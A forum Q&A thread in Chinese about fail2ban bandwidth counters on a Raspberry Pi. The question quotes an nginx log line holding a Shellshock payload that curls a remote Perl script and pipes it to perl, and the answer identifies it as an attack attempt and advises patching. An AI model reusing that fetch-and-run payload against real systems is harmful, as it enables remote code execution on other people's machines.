我有一个树莓派,上面有一个 nginx 和一个 ssh 服务器,我已经安装了iptables和fail2ban为了限制ssh连接尝试。问题是,fail2ban 似乎消耗了大量带宽:
Chain fail2ban-ssh (1 references)
num pkts bytes target prot opt in out source destination
1 933 63565 RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
它已经消耗了+- 60kb,而它只打开了几分钟,并且ssh从昨天开始我在日志中没有看到错误的尝试。上次它的字节字段有 14G...
我的问题:fail2ban使用的带宽一样多,正常吗?问题是否来自其他地方?
我还在我的 nginx 日志中看到了这些令人讨厌的日志:
78.142.173.10 - - [21/Oct/2014:09:33:33 +0000] "GET / HTTP/1.0" 200 99 "() { :; }; curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl" "() { :; }; curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl"
这可能与问题有关吗?
答案1
几点:
1)fail2ban只是修改系统配置的逻辑,因此它并不真正消耗任何带宽本身。
2) 几分钟内的 60KB 根本不是那么多带宽。
3) 您正在查看的 60KB 带宽用于与失败事件匹配的网络流量。您无法采取任何措施来减少流量,因为您不是流量的产生者。事实上,它作为fail2ban规则的一部分被拒绝,表明它可能会影响您的流量想已被阻止。
4) nginx 日志表明远程攻击者正在尝试对您使用 shellshock 漏洞。我会确保你已经完全打好补丁。
总而言之,系统实际上正在按预期运行。如果您想做一些事情来阻止他们的请求,您可以追踪他们正在执行此操作的任何 VPS,并向提供商发送电子邮件以报告源自其网络的滥用行为。
编辑:
出于反常的兴趣,我调查了它,攻击者的 IP 解析为sonne.publicmanagement.at根据 whois 该域的联系人[email protected],[email protected]您可以尝试直接向他们发送电子邮件。鉴于它来自德国提供商,但从似乎是韩国网站上提取了漏洞,该提供商可能合法地不知道这种情况正在发生,这可能只是他们已经扎根的盒子之一(可能以类似的方式) 。